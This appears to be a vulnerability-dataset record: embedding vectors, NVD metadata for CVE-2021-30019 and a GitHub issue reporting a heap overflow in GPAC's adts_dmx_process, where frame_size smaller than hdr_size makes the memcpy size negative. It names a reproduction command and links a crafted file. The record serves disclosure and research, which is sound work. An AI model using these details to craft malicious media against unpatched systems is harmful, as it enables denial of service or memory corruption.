0.01013529859483242, 0.013981658034026623, 0.013644750230014324, -0.009433407336473465, 0.006306485738605261, -0.019933689385652542, -0.006990829017013311, -0.004467532970011234, 0.0015309985028579831, 0.008577100932598114, 0.0008883301052264869, -0.01001597661525011, -0.008612195961177349, -0.002482937416061759, 0.02091633528470993, 0.001182685373350978, 0.011784740723669529, -0.007748870644718409, 0.0028988076373934746, 0.004288550466299057, 0.005204517859965563, 0.007678681518882513, 0.005699350498616695, -0.009615899063646793, -0.015666194260120392, 0.006959243677556515, -0.022292040288448334, -0.005387009121477604, -0.00982646644115448, -0.0036147357895970345, 0.013728977181017399, 0.018586060032248497, -0.011967232450842857, -0.017968395724892616, 0.007952419109642506, 0.011623306199908257, 0.01335697527974844, -0.01457124575972557, 0.02196917124092579, 0.004053417593240738, -0.007636568043380976, -0.014346640557050705, -0.0199617650359869, 0.00598712544888258, -0.020832108333706856, 0.004123606253415346, -0.020045991986989975, 0.0013713184744119644, 0.010928434319794178, 0.008478837087750435, 0.014318564906716347, 0.011868967674672604, -0.013272748328745365, -0.0015950460219755769, -0.0018038584385067225, 0.0048570819199085236, -0.014472980983555317, 0.016129443421959877, -0.015399476513266563, -0.008436723612248898, 0.010858245193958282, 0.0038533785846084356, 0.014852002263069153, 0.006050295662134886, 0.020804032683372498, -0.015778496861457825, -0.01513275783509016, 0.008878914639353752, -0.008584120310842991, -0.01349735353142023, 0.01760341227054596, 0.0009317595977336168, -0.022123586386442184, -0.00043188195559196174, 0.0018494813703000546, -0.026980668306350708, 0.005959049798548222, -0.007776946295052767, -0.010416054166853428, -0.0043447017669677734, -0.021042676642537117, -0.010991604067385197, -0.022081473842263222, 0.0021442752331495285, -0.010802093893289566, 0.0025092584546655416, -0.01443086750805378, -0.020719805732369423, -0.0021793697960674763, 0.007257547229528427, -0.01088632084429264, 0.012977954931557178, -0.0037094911094754934, 0.01139870099723339, 0.00666094059124589, -0.01705593802034855, -0.01631193421781063, 0.004337682854384184, -0.02347121760249138, 0.018094735220074654, -0.00246889959089458, -0.019905613735318184, -0.023330839350819588, 0.005015007220208645, -0.01750514842569828, -0.012416441924870014, -0.014922191388905048, 0.011181115172803402, -0.0009308822336606681, 0.005695840809494257, 0.011546097695827484, -0.009173708036541939, -0.01702786237001419, 0.012907765805721283, 0.0023899369407445192, -0.010556432418525219, 0.00035072589525952935, 0.005229083821177483, 0.004471042193472385, 0.015806572511792183, -0.002326766960322857, 0.019877538084983826, -0.008113853633403778, -0.0010852981358766556, -0.021267279982566833, 0.016845371574163437, 0.004783383570611477, -0.0011440814705565572, 0.005667765624821186, -0.012212893925607204, 0.0175753366202116, -0.024060804396867752, -0.002075840951874852, 0.004695646930485964, 0.014866040088236332, -0.04006390646100044, -0.011475908569991589, 0.010423073545098305, 0.008338458836078644, -0.016017140820622444, -0.0007861173362471163, -0.005204517859965563, 0.006131012924015522, -0.015497741289436817, -0.004646515008062124, 0.006611808203160763, -0.0001442165521439165, -0.0012642801739275455, 0.0133078433573246, -0.013567542657256126, 0.006822375115007162, 0.004646515008062124, 0.03091125562787056, 0.0023899369407445192, 0.023022007197141647, -0.01074594259262085, 0.02783697471022606, -0.0008558676927350461, 0.007692719344049692, -0.012030402198433876, -0.003860397497192025, 0.01674710586667061, -0.007959437556564808, 0.008162985555827618, 0.001369563746266067, -0.002782995579764247, -0.017589375376701355, -0.020495200529694557, -0.015048530884087086, 0.004070964641869068, 0.022235888987779617, -0.0015318759251385927, 0.0049097235314548016, 0.01351139135658741, 0.009335143491625786, 0.005408065859228373, 0.00788222998380661, 0.017519185319542885, 0.0004489905550144613, -0.0033427532762289047, -0.013778110034763813, -0.014936229214072227, -0.03183775022625923, 0.02392042614519596, -0.004965874832123518, 0.005815162323415279, 0.011391681618988514, 0.012760368175804615, -0.0017029617447406054, 0.004621948581188917, -0.009910693392157555, -0.0024180125910788774, 0.022221852093935013, 0.010331827215850353, -0.019301988184452057, -0.0023425593972206116, 0.004632477182894945, -0.028805583715438843, -0.0006132767884992063, 0.018207037821412086, 0.0007856786251068115, 0.018993156030774117, 0.01743495836853981, 0.003223431995138526, 0.026966631412506104, 0.003916548565030098, 0.03585256263613701, 0.004130625165998936, -0.006846941541880369, 0.014136074110865593, 0.031781598925590515, 0.0070575084537267685, -0.005460707936435938, 0.010689791291952133, -0.015006418339908123, 0.002782995579764247, -0.009798390790820122, 0.020649617537856102, 0.009573785588145256, -0.010928434319794178, -0.004151681903749704, -0.004288550466299057, 0.0029602230060845613, 0.008226156234741211, 0.0024180125910788774, -0.005759011022746563, -0.0291705671697855, -0.008345477283000946, 0.008696422912180424, 0.04497713968157768, 0.002188143553212285, -0.003969190642237663, -0.008738536387681961, 0.017996471375226974, -0.0032216771505773067, -0.016354046761989594, 0.023962540552020073, 0.011370625346899033, -0.015259098261594772, 0.0061485604383051395, -0.006601279601454735, 0.006246825214475393, 0.004916742444038391, -0.00736283091828227, -0.0037059816531836987, 0.024650393053889275, -0.014922191388905048, -0.026391081511974335, -0.010998623445630074, -0.002860203618183732, -0.01370090153068304, -0.007257547229528427, 0.007201395928859711, -0.0015143286436796188, 0.009257934987545013, -0.006896073929965496, 0.0034375085961073637, 0.003012864850461483, -0.013209578581154346, 0.004871119745075703, 0.013539467006921768, -0.019231798127293587, -0.008549025282263756, 0.017785904929041862, -0.006176636088639498, -0.009594842791557312, 0.0025180319789797068, -0.027780823409557343, -0.005390518810600042, -0.032904624938964844, -0.004390324931591749, -0.009033329784870148, 0.010633639991283417, 0.0020828598644584417, 0.01617155596613884, -0.025324206799268723, 0.002384672872722149, -0.026966631412506104, -0.00927899219095707, 0.012430479750037193, 0.016564615070819855, -0.006973281502723694, 0.004211342893540859, 0.007292641792446375, -0.014002714306116104, -0.006927658803761005, 0.0006918007857166231, 0.01617155596613884, -0.001467828406020999, 0.020453087985515594, -0.0084437420591712, -0.01648038811981678, 0.0010458168108016253, -0.013960600830614567, -0.014978342689573765, -0.014936229214072227, -0.010703829117119312, 0.005632671061903238, 0.0008690280956216156, -0.009545709937810898, -0.01733669452369213, 0.004379796329885721, -0.019372176378965378, 0.010830169543623924, -0.00926495436578989, -0.0033497721888124943, -0.005671274848282337, -0.019695045426487923, -0.008984197862446308, 0.00040270964382216334, 0.002846165793016553, 0.015708308666944504, -0.010633639991283417, 0.004186776466667652, -0.00840864796191454, -0.017252467572689056, 0.003546301508322358, -0.007468114607036114, 0.003976209554821253, 0.014641434885561466, 0.0021758603397756815, -0.03492606803774834, 0.007868192158639431, -0.0035796412266790867, -0.013876373879611492, -0.00007984003605088219, 0.000654512841720134, 0.022502608597278595, 0.004418400581926107, 0.03164122253656387, 0.017757829278707504, -0.024173106998205185, -0.011314474046230316, -0.017870131880044937, 0.004885157570242882, 0.00012634028098545969, 0.0017336694290861487, 0.025955909863114357, 0.0007369849481619895, 0.0019670480396598577, 0.0008804338285699487, -0.005920446012169123, -0.004267494194209576, -0.014318564906716347, -0.0334380604326725, 0.0072364904917776585, -0.02764044515788555, 0.017729753628373146, 0.02166033908724785, 0.013237654231488705, 0.026110325008630753, 0.009152651764452457, 0.0010545904515311122, 0.01316746510565281, 0.013750034384429455, -0.002874241443350911, 0.004425419494509697, -0.011349569074809551, 0.000755409593693912, -0.01726650446653366, 0.00047991759493015707, -0.031107785180211067, -0.019161609932780266, 0.0419730506837368, -0.002779486123472452, 0.02173052914440632, 0.011609268374741077, 0.0059555405750870705, 0.011875986121594906, -0.005183461122214794, -0.004762326832860708, 0.002568918978795409, -0.01610136777162552, -0.00011778598855016753, -0.007980494759976864, 0.007306679617613554, -0.015399476513266563, -0.005039573647081852, 0.011953194625675678, -0.00008696861186763272, 0.011061793193221092, -0.023288724943995476, -0.019470442086458206, 0.006169617176055908, 0.00667146872729063, -0.001251119771040976, -0.01583464816212654, -0.005004479084163904, 0.014444905333220959, 0.016662878915667534, 0.009187745861709118, 0.003955152817070484, -0.02036886103451252, 0.0055203684605658054, 0.013609656132757664, 0.0013537711929529905, 0.009208803065121174, -0.0054712360724806786, -0.0009142123162746429, 0.005888861138373613, 0.015329287387430668, -0.008029626682400703, -0.013876373879611492, 0.01156715489923954, -0.005734445061534643, 0.005137837957590818, -0.0063275424763560295, 0.018347416073083878, -0.007910305634140968, 0.0119391568005085, 0.007127697579562664, 0.004916742444038391, -0.00018490426009520888, 0.006903092842549086, 0.0062117306515574455, -0.00043846218613907695, 0.021744566038250923, -0.007755889557301998, 0.019610818475484848, 0.01685940846800804, -0.002049520146101713, -0.014283470809459686, -0.004860591609030962, -0.013406108133494854, -0.025562850758433342, -0.004488589242100716, -0.004755307920277119, -0.03456108644604683, 0.0007339142030104995, 0.010472205467522144, 0.02006002888083458, -0.014269432984292507, 0.024102918803691864, -0.018979117274284363, -0.004288550466299057, -0.02463635429739952, 0.003183073131367564, 0.00756637891754508, -0.006583732552826405, -0.004207833204418421, -0.018193000927567482, -0.00982646644115448, 0.0035129617899656296, 0.0037902083713561296, -0.010689791291952133, 0.01576445996761322, -0.014458943158388138, -0.015525816939771175, -0.01648038811981678, -0.01579253561794758, -0.009594842791557312, 0.005874823313206434, 0.027008743956685066, 0.007819059304893017, 0.011854929849505424, 0.009391293860971928, 0.012956897728145123, 0.000059551017329795286, -0.01175666507333517, -0.007854154333472252, -0.014353659935295582, 0.004695646930485964, 0.022614911198616028, 0.014206263236701488, 0.01158119272440672, -0.008226156234741211, 0.006590751465409994, 0.0033497721888124943, 0.0004737760464195162, -0.004632477182894945, -0.009236878715455532, -0.007531284354627132, -0.00667848763987422, -0.006145050749182701, -0.0033462627325206995, -0.008654309436678886, 0.02163226343691349, -0.010303751565515995, 0.0035919244401156902, 0.005397537723183632, -0.005983616225421429, 0.003765642177313566, -0.006236296612769365, -0.00772079499438405, 0.0013485070085152984, 0.021351506933569908, 0.014487018808722496, 0.00791732408106327, -0.01299901120364666, 0.00011164444731548429, 0.01767360232770443, 0.010977566242218018, 0.03141661733388901, 0.01021952461451292, -0.017182277515530586, 0.02105671353638172, -0.005222064908593893, 0.006636374164372683, 0.020481163635849953, -0.0031321861315518618, 0.019372176378965378, 0.01764552667737007, 0.008268269710242748, -0.0036147357895970345, 0.030012836679816246, -0.017448997125029564, -0.01122322864830494, -0.009370237588882446, 0.014318564906716347, -0.02552073635160923, -0.036386001855134964, -0.008689403533935547, -0.04121500626206398, 0.019540630280971527, 0.0087876683101058, -0.0026022589299827814, 0.0030777896754443645, -0.008773630484938622, -0.007152263540774584, 0.021997246891260147, 0.008120873011648655, 0.006601279601454735, 0.015174871310591698, -0.020958449691534042, 0.019372176378965378, -0.0014371207216754556, 0.024355599656701088, 0.000715050904545933, 0.01426241360604763, 0.008022608235478401, -0.009117556735873222, 0.0002093607618007809, 0.0112583227455616, 0.006531090475618839, -0.011897043325006962, -0.001124779460951686, -0.003895492060109973, 0.013785128481686115, -0.009910693392157555, 0.007980494759976864, -0.00035686741466633976, -0.0005558095290325582, 0.00011515390360727906, 0.007383887656033039, -0.001467828406020999, -0.004414890892803669, -0.0048570819199085236, 0.0104932626709342, 0.023022007197141647, -0.019681008532643318, -0.0032269414514303207, -0.005937993060797453, 0.0016459331382066011, -0.01139870099723339, -0.01600310206413269, 0.003523490158841014, 0.015975026413798332, -0.004092021379619837, -0.004927271045744419, 0.014992380514740944, -0.0009045613114722073, 0.027794862166047096, 0.012879690155386925, -0.008640271611511707, -0.018445681780576706, 0.011679457500576973, 0.013602636754512787 ]
149
CVE-2021-30019
2021-04-19T20:15:14.490000
In the adts_dmx_process function in filters/reframe_adts.c in GPAC 1.0.1, a crafted file may cause ctx->hdr.frame_size to be smaller than ctx->hdr.hdr_size, resulting in size to be a negative number and a heap overflow in the memcpy.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/22774aa9e62f586319c8f107f5bae950fed900bc" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1723" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1723
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
In `filters/reframe_adts.c`, function `adts_dmx_process`. There is a sub codes like as below: ` size = ctx->hdr.frame_size - ctx->hdr.hdr_size; offset = ctx->hdr.hdr_size; ...... memcpy(output, sync + offset, size); ` However, with crafted file, ctx->hdr.frame_size may be smaller than ctx->hdr.hdr_size. So, the size may be a negative number, which results a heap overflow in memcpy. In Command line: gpac -info bug6 ![bug6_cmd](https://user-images.githubusercontent.com/44844446/112800680-8d05c780-90a2-11eb-8b87-557d15fc11b4.png) In gdb: ![bug6](https://user-images.githubusercontent.com/44844446/112800687-8f682180-90a2-11eb-964a-1ace9cba1bff.png) The crafted file is in the attached zip: [bug6.zip](https://github.com/gpac/gpac/files/6219966/bug6.zip)
A integer (heap) overflow in function adts_dmx_process
https://api.github.com/repos/gpac/gpac/issues/1723/comments
1
2021-03-29T07:23:30
2021-03-29T07:47:23Z
https://github.com/gpac/gpac/issues/1723
843,060,662
1,723
true
This is a GitHub Issue repo:gpac owner:gpac Title : A integer (heap) overflow in function adts_dmx_process Issue date: --- start body --- In `filters/reframe_adts.c`, function `adts_dmx_process`. There is a sub codes like as below: ` size = ctx->hdr.frame_size - ctx->hdr.hdr_size; offset = ctx->hdr.hdr_size; ...... memcpy(output, sync + offset, size); ` However, with crafted file, ctx->hdr.frame_size may be smaller than ctx->hdr.hdr_size. So, the size may be a negative number, which results a heap overflow in memcpy. In Command line: gpac -info bug6 ![bug6_cmd](https://user-images.githubusercontent.com/44844446/112800680-8d05c780-90a2-11eb-8b87-557d15fc11b4.png) In gdb: ![bug6](https://user-images.githubusercontent.com/44844446/112800687-8f682180-90a2-11eb-964a-1ace9cba1bff.png) The crafted file is in the attached zip: [bug6.zip](https://github.com/gpac/gpac/files/6219966/bug6.zip) --- end body ---
946
[ -0.02911248430609703, 0.01428187545388937, -0.010841174982488155, 0.01517912745475769, 0.04674607887864113, 0.036572281271219254, -0.03179682418704033, 0.040635865181684494, -0.02458914928138256, 0.021741671487689018, -0.011931224726140499, -0.0016035594744607806, 0.026739586144685745, 0.004942300263792276, 0.021949300542473793, 0.014637810178101063, -0.036157023161649704, 0.0031403813045471907, -0.003702090587466955, -0.01689206250011921, 0.032686661928892136, -0.024070076644420624, -0.015853920951485634, 0.03704686090350151, -0.020970480516552925, 0.013836957514286041, -0.016269177198410034, 0.010722530074417591, 0.008757473900914192, 0.006610743701457977, 0.013251148164272308, 0.03944941982626915, -0.01882004179060459, 0.023417530581355095, 0.06377161294221878, 0.005209251306951046, 0.042563844472169876, 0.093017578125, -0.00073967658681795, -0.007585856132209301, -0.01938360556960106, -0.024752285331487656, -0.05134356766939163, 0.009439682587981224, 0.0008254160638898611, 0.01923529990017414, 0.030699359253048897, -0.000737359281629324, -0.04137739911675453, -0.008223572745919228, 0.037402793765068054, -0.0315595343708992, -0.05395375192165375, -0.028044680133461952, -0.009573157876729965, -0.01289521437138319, 0.034673962742090225, 0.016862401738762856, 0.003288687439635396, 0.03580109030008316, 0.00803077407181263, 0.00832738634198904, -0.0007382862386293709, 0.03206377476453781, -0.006862863898277283, -0.032093435525894165, -0.03339853137731552, 0.0427418127655983, -0.00439356779679656, 0.049860503524541855, -0.015082729049026966, -0.04710201174020767, -0.0027974233962595463, 0.038737550377845764, 0.030432408675551414, -0.02491542138159275, 0.02154887467622757, 0.03345785290002823, -0.029928168281912804, 0.007155768573284149, -0.0406951904296875, 0.02062937617301941, -0.037907034158706665, 0.01868656650185585, 0.01905733160674572, -0.01213143765926361, -0.034851931035518646, -0.07533948868513107, -0.03369514271616936, -0.03556380048394203, 0.0031570657156407833, 0.009906846098601818, 0.008127173408865929, 0.0024748577270656824, -0.01453399658203125, 0.01790054515004158, -0.01979886181652546, -0.01035918015986681, -0.03497057408094406, -0.030373085290193558, -0.04897066950798035, -0.03236038610339165, -0.009936507791280746, 0.017544610425829887, 0.007704501040279865, 0.008883533999323845, -0.009209807962179184, -0.02320990152657032, -0.00268248631618917, 0.11864486336708069, 0.01102655753493309, -0.010559393092989922, -0.018701396882534027, 0.022957781329751015, 0.018864532932639122, 0.002135607646778226, -0.008712982758879662, -0.02731798030436039, -0.002083700383082032, -0.008446031250059605, -0.017826391384005547, -0.027659084647893906, -0.043809618800878525, 0.02611670084297657, -0.018671736121177673, 0.04188163951039314, -0.034495994448661804, -0.011493721045553684, -0.044462163001298904, -0.02883070334792137, -0.06021226942539215, -0.018286140635609627, 0.02579042874276638, -0.024974744766950607, 0.012657924555242062, -0.018523430451750755, -0.01110071036964655, 0.03894517943263054, 0.004434351809322834, 0.00431570690125227, -0.043809618800878525, -0.025019235908985138, 0.0259387344121933, -0.0033721094951033592, -0.010581638664007187, -0.016684435307979584, -0.010247950442135334, 0.008601753041148186, -0.03852992132306099, 0.018493767827749252, -0.008868703618645668, -0.03081800416111946, 0.01647680625319481, 0.00554664758965373, 0.03387311100959778, 0.00005465890353661962, 0.005687538534402847, 0.03212309628725052, 0.0043676141649484634, -0.02722899615764618, 0.009105993434786797, -0.03381378576159477, 0.024618810042738914, 0.004426936618983746, -0.028949348255991936, -0.05255967751145363, 0.008735228329896927, 0.020688699558377266, -0.012591186910867691, 0.026546789333224297, -0.01997683010995388, -0.007126107346266508, 0.007860222831368446, 0.040665529668331146, -0.04532233998179436, -0.01800435781478882, 0.000011622620149864815, 0.033517174422740936, -0.03105529397726059, -0.01110071036964655, -0.01229457464069128, -0.0006075914716348052, 0.015171712264418602, -0.010841174982488155, 0.013340132310986519, -0.0020966771990060806, 0.008090096525847912, -0.041911300271749496, 0.033339206129312515, -0.028089173138141632, -0.0037373132072389126, -0.011271262541413307, 0.010114475153386593, -0.014927007257938385, 0.0394197553396225, -0.014089077711105347, -0.04550030827522278, -0.02058488503098488, -0.0004270751669537276, 0.0048125325702130795, 0.017455626279115677, -0.03132224455475807, -0.025123050436377525, 0.01735181175172329, -0.051521532237529755, 0.022646339610219002, -0.021148446947336197, 0.05072068050503731, -0.007252167444676161, -0.02653195895254612, -0.02880104072391987, -0.04182231426239014, 0.022735321894288063, 0.017470456659793854, -0.021014971658587456, 0.005909997504204512, -0.011983131989836693, 0.0018862680299207568, -0.03461464121937752, -0.016269177198410034, 0.05000881105661392, -0.005791352596133947, 0.0016591743333265185, 0.0035167080350220203, -0.03494091331958771, -0.007437549997121096, -0.018998010084033012, 0.013251148164272308, -0.03784771263599396, 0.01776706799864769, 0.024529825896024704, 0.003650183556601405, -0.004664226435124874, -0.01243546511977911, 0.016728926450014114, -0.024885760620236397, -0.023921770974993706, 0.0023988508619368076, 0.010707699693739414, -0.014667471870779991, -0.007482042070478201, 0.04268249124288559, -0.01303610485047102, -0.027051029726862907, 0.010262780822813511, 0.04019095003604889, -0.005720907356590033, 0.025627290830016136, -0.018834872171282768, 0.028534090146422386, -0.008334801532328129, 0.01643231324851513, 0.012413219548761845, 0.01296936720609665, -0.032834965735673904, 0.019264960661530495, 0.001230013556778431, 0.009276545606553555, -0.025642121210694313, -0.048703718930482864, 0.01540900208055973, -0.009780786000192165, -0.03096630983054638, -0.021296754479408264, -0.015453494153916836, -0.009647310711443424, 0.0026157484389841557, -0.015468324534595013, 0.009684387594461441, -0.04087315499782562, -0.011983131989836693, -0.01766325533390045, -0.06531400233507156, -0.03494091331958771, 0.013221487402915955, 0.01259860210120678, 0.005335311405360699, 0.009358113631606102, 0.003956064581871033, 0.011827410198748112, -0.008527600206434727, 0.0121388528496027, -0.010077398270368576, 0.029646385461091995, -0.010670622810721397, 0.011286092922091484, 0.02150438167154789, -0.02961672469973564, -0.02183065563440323, 0.007333735935389996, 0.018538260832428932, 0.0017546463059261441, -0.053924091160297394, -0.0031607733108103275, 0.011708765290677547, 0.010040322318673134, -0.016180193051695824, -0.00008747741958359256, -0.01451175007969141, -0.012724662199616432, -0.04291978105902672, 0.00922463834285736, 0.01892385631799698, -0.009083747863769531, -0.03847059980034828, 0.006325254682451487, -0.04200028255581856, 0.026917554438114166, -0.0010993188479915261, -0.012279743328690529, 0.038737550377845764, -0.06857673078775406, -0.03354683518409729, -0.01790054515004158, -0.010003245435655117, -0.03672058507800102, -0.007166891358792782, -0.013570006936788559, -0.015883581712841988, -0.0034870468080043793, -0.017055200412869453, -0.018760720267891884, -0.015320018865168095, 0.01310284249484539, 0.022394219413399696, 0.005279696546494961, -0.024618810042738914, 0.022275574505329132, -0.046301160007715225, 0.02266116999089718, -0.022364556789398193, -0.005301942583173513, -0.006996339652687311, -0.052945271134376526, -0.014014924876391888, -0.024159060791134834, -0.01033693365752697, 0.0010539001086726785, 0.006948139984160662, -0.007897298783063889, -0.00569866131991148, 0.007574733346700668, 0.005379803013056517, -0.016625111922621727, 0.0009908700594678521, 0.021014971658587456, -0.0006275201449170709, -0.00466051883995533, -0.0017907959409058094, -0.027332810685038567, 0.0009120824397541583, 0.023402700200676918, 0.033012934029102325, 0.04843676835298538, 0.023417530581355095, -0.017648423090577126, -0.015661122277379036, 0.00012119387974962592, 0.01294712070375681, -0.02196413092315197, 0.006862863898277283, -0.012057284824550152, 0.026932384818792343, 0.031767163425683975, -0.0029160683043301105, 0.009120823815464973, -0.008683321066200733, -0.02218659035861492, -0.02094081975519657, 0.004897808190435171, -0.006707142572849989, 0.03072902001440525, -0.03876721113920212, 0.01347360759973526, -0.02504889667034149, 0.005858090240508318, 0.041407059878110886, -0.008809381164610386, -0.03197479248046875, 0.014548826962709427, -0.022853966802358627, 0.030462069436907768, 0.032686661928892136, -0.059737689793109894, 0.011152617633342743, 0.012687585316598415, -0.04315707087516785, 0.04369097203016281, -0.03494091331958771, -0.008334801532328129, -0.027555270120501518, 0.017826391384005547, -0.03630533069372177, -0.031114615499973297, -0.03930111229419708, 0.01647680625319481, -0.009054086171090603, -0.025019235908985138, 0.03262733668088913, -0.024692963808774948, 0.022587016224861145, -0.01591324247419834, 0.029127314686775208, 0.014363444410264492, 0.0005427075666375458, 0.04493674263358116, 0.011286092922091484, 0.004697595257312059, 0.03930111229419708, -0.0033628405071794987, 0.01698104664683342, 0.003837419906631112, -0.019027670845389366, -0.007934375666081905, 0.015149466693401337, 0.03672058507800102, -0.009246883913874626, 0.013251148164272308, -0.039479080587625504, 0.02067386731505394, -0.012628262862563133, 0.010025491006672382, -0.00932103767991066, 0.028726888820528984, 0.01110071036964655, 0.03479260578751564, -0.013162164948880672, 0.033012934029102325, 0.017040368169546127, -0.015705613419413567, 0.014244799502193928, 0.002163415076211095, 0.0037614130415022373, -0.01167168840765953, -0.018701396882534027, -0.023877279832959175, -0.04437318071722984, -0.03396209329366684, -0.0448477603495121, 0.004894100595265627, -0.043720632791519165, 0.011419568210840225, -0.009565742686390877, -0.014845439232885838, 0.013777635060250759, -0.04232655465602875, -0.02524169534444809, 0.002954998752102256, 0.02524169534444809, -0.03761042281985283, -0.01813783496618271, -0.004007971845567226, 0.0010511194122955203, -0.02814849466085434, 0.009024425409734249, -0.0038522505201399326, 0.01827131025493145, -0.020866665989160538, 0.024989575147628784, -0.000659035169519484, -0.01781156100332737, 0.02205311506986618, -0.013970432803034782, -0.005776521749794483, 0.08210224658250809, 0.042148590087890625, 0.007111276499927044, -0.02091115713119507, -0.003377671120688319, -0.009454512968659401, -0.007122399751096964, 0.007022293284535408, -0.001780599937774241, -0.0005060944822616875, -0.010856005363166332, 0.029142145067453384, -0.036987535655498505, 0.001751865609548986, 0.022216251119971275, -0.05178848281502724, 0.021578535437583923, -0.011441814713180065, 0.015305187553167343, 0.01726282760500908, 0.02589424140751362, -0.010003245435655117, 0.021014971658587456, 0.010218288749456406, -0.012858137488365173, 0.013347547501325607, 0.007089030928909779, 0.025775596499443054, 0.008757473900914192, -0.026828570291399956, 0.004797701723873615, -0.0010168235749006271, -0.01623951643705368, 0.02561246044933796, 0.06122075021266937, 0.028756549581885338, 0.0050016227178275585, -0.029008669778704643, 0.02237938717007637, -0.00651805242523551, 0.008067850954830647, -0.02926078997552395, -0.02874171920120716, 0.029705708846449852, 0.0039004499558359385, -0.02980952337384224, 0.007971451617777348, 0.0003596422611735761, -0.0016582474345341325, -0.041555363684892654, -0.022067945450544357, -0.027421794831752777, 0.035919733345508575, -0.012524448335170746, 0.0163878221064806, -0.000656717864330858, -0.03191547095775604, -0.007574733346700668, -0.012124022468924522, 0.02436668984591961, 0.01028502732515335, 0.013681236654520035, 0.03710618242621422, 0.0056504616513848305, -0.000042551102524157614, -0.014830607920885086, -0.024930251762270927, -0.0056615849025547504, -0.0021040926221758127, 0.0016239515971392393, -0.012635678052902222, 0.008601753041148186, -0.0034425549674779177, 0.0257459357380867, 0.010433332994580269, 0.024099739268422127, 0.0027177089359611273, 0.04407656937837601, -0.04727998003363609, 0.015023406594991684, -0.02209760621190071, 0.028207818046212196, 0.008979933336377144, 0.010411087423563004, 0.001450618845410645, -0.0016814202535897493, 0.015290357172489166, -0.022690830752253532, 0.018108172342181206, 0.024114569649100304, -0.004630857612937689, 0.02791120484471321, 0.005676415283232927, 0.007667424622923136, 0.005958196707069874, 0.020703529939055443, -0.0005658803856931627, -0.00042614826816134155, 0.012865552678704262, -0.009803032502532005, -0.00438244454562664, -0.01748528704047203, 0.010767022147774696, 0.01698104664683342, -0.01873105764389038, -0.018909025937318802, 0.017233166843652725, -0.022809475660324097, 0.008957687765359879, 0.015497985295951366, 0.0020633083768188953, 0.03568244352936745, -0.010433332994580269, -0.0033294716849923134, -0.015216204337775707, -0.0016183900879696012, 0.013191825710237026, -0.03040274791419506, -0.0013987116981297731, 0.022067945450544357, 0.022809475660324097, -0.020006490871310234, -0.01665477268397808, -0.0005658803856931627, -0.0061806561425328255, -0.014474674127995968, -0.006796126253902912, 0.015423832461237907, -0.016728926450014114, -0.007734162267297506, -0.007748992647975683, -0.009714048355817795, 0.0049719614908099174, 0.006121333688497543, 0.019902676343917847, -0.0010919035412371159, -0.015290357172489166, 0.040665529668331146, -0.005420587491244078, -0.03013579547405243, -0.02541966363787651, 0.010893082246184349, -0.00031422352185472846, 0.01116744801402092, -0.041407059878110886, 0.020748021081089973, 0.0056059700436890125, 0.010781852528452873, 0.05789869651198387, 0.0005399268120527267, 0.007129814941436052, 0.015601799823343754, -0.0018964640330523252, 0.014044586569070816, -0.013651574961841106, 0.030699359253048897, 0.048288460820913315, -0.027466285973787308, -0.008594337850809097, -0.007063077297061682, 0.025167541578412056, 0.000021550727979047224, -0.005620800424367189, -0.019991660490632057, -0.016417482867836952, -0.01947258971631527, -0.006658943369984627, 0.03390277177095413, -0.016758587211370468, -0.03138156607747078, -0.012717247009277344, 0.019413266330957413, 0.024114569649100304, -0.006317839026451111, -0.008853873237967491, 0.026383651420474052, -0.0068888175301253796, 0.004464013036340475, -0.035741765052080154, 0.0076229325495660305, -0.024663301184773445, 0.0042267232201993465, 0.022023454308509827, 0.007000047247856855, 0.028163325041532516, 0.03055105358362198, -0.01910182274878025, -0.01494925282895565, 0.004022802691906691, 0.0205403920263052, 0.00797886773943901, -0.016447145491838455, 0.03710618242621422, 0.036334991455078125, -0.0026435558684170246, -0.022868799045681953, -0.04609353095293045, -0.04959355294704437, -0.0004432961577549577, -0.022913290187716484, 0.02851925976574421, -0.007734162267297506, 0.004630857612937689, -0.031767163425683975, 0.014422766864299774, 0.01361449807882309, 0.010329518467187881, -0.002031793352216482, 0.009098578244447708, 0.02145989052951336, -0.006521760020405054, -0.02006581239402294, 0.016966216266155243, 0.03298327326774597, -0.015705613419413567, 0.0037688284646719694, -0.007500580046325922, -0.029928168281912804, -0.025063728913664818, 0.025671783834695816, -0.022779814898967743, -0.007066784892231226, 0.010233120061457157, -0.0003777170495595783, -0.025968395173549652, -0.00290123769082129, 0.045292679220438004, -0.016906892880797386, 0.027258658781647682, 0.0415257029235363, -0.01595773547887802, -0.018760720267891884, 0.015231034718453884, -0.016669603064656258, -0.006918478757143021, -0.004423229023814201, -0.03455531597137451, 0.0008142931037582457, 0.010640961118042469, -0.005624508019536734, -0.009699217975139618, 0.01444501243531704, -0.005572601221501827, 0.0011391760781407356, -0.0020688697695732117, -0.011249016039073467, 0.001697177765890956, 0.009951338171958923, -0.028756549581885338, 0.007964036427438259, 0.004664226435124874, -0.03064003773033619, 